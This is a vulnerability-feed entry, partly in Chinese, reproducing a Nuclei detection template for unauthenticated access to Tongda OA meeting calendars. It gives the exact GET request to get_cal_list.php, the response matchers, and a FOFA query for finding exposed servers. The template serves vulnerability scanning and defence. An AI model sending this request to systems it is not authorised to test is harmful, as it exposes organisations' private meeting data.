tongda-meeting-unauth: Tongda OA Meeting - Unauthorized Access

日期: 2025-08-01 | 影响软件: Tongda OA Meeting | POC: 已公开

漏洞描述

Tongda Meeting Unauthorized Access were Detected.

PoC代码[已公开]

id: tongda-meeting-unauth

info:
  name: Tongda OA Meeting - Unauthorized Access
  author: SleepingBag945
  severity: medium
  description: |
    Tongda Meeting Unauthorized Access were Detected.
  reference:
    - https://github.com/hktalent/scan4all/blob/2a7faf7862265eab33699034fd193bcf11b44e0f/config/poc/%E9%80%9A%E8%BE%BEoa/%E9%80%9A%E8%BE%BEoa-meeting-unauthorized-access.json#L10
  classification:
    cpe: cpe:2.3:a:tongda2000:office_anywhere:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: tongda2000
    product: office_anywhere
    fofa-query: app="TDXK-通达OA"
  tags: tongda,unauth,misconfig

http:
  - method: GET
    path:
      - "{{BaseURL}}/general/calendar/arrange/get_cal_list.php?starttime=1548058874&endtime=33165447106&view=agendaDay"

    matchers:
      - type: dsl
        dsl:
          - status_code == 200 && contains(header, 'application/json')
          - contains_all(body, 'creator\":', 'originalTitle\":', 'view\":', 'type\":')
        condition: and
# digest: 4a0a0047304502204750f51c258751b071373b1d1a1ce77dded4770cf58f591cd13cdcb5155c9df0022100b68981cc14f2052cb628d71a47b1bdbb3ff4aeee686927d3dff3c7a8859247a4:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/./http/vulnerabilities/tongda/tongda-meeting-unauth.yaml